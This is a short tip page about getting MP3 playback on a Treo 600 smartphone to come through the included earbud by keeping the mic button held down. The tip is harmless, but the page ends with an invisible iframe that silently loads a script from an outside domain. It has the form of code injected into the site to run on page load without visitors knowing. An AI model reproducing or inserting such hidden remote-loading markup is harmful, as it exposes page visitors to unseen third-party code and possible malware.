How do I get MP3 playback to go through the standard earbud?

By default, if you playback music like MP3s while you have the standard included earbud in use, the music will come out the external Treo 600 speaker, not the earbud. This is kind of strange, but that's the way it works.

pdaPhoneHome user BriOnH came up with this great tip to get around this problem...

If you plug in your earbud/mic cable and hold down the button on the mic (to end/answer calls), you get your MP3 playback to come through your earbud. Not wanting to hold the button in all the time, you need to come up with a way to keep it pressed. Two suggestions were a big black paper, or a velcro strip wrapped around the button. Then when a call comes in, remove the apparatus holding down the mic button and then press the button again to answer the call.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
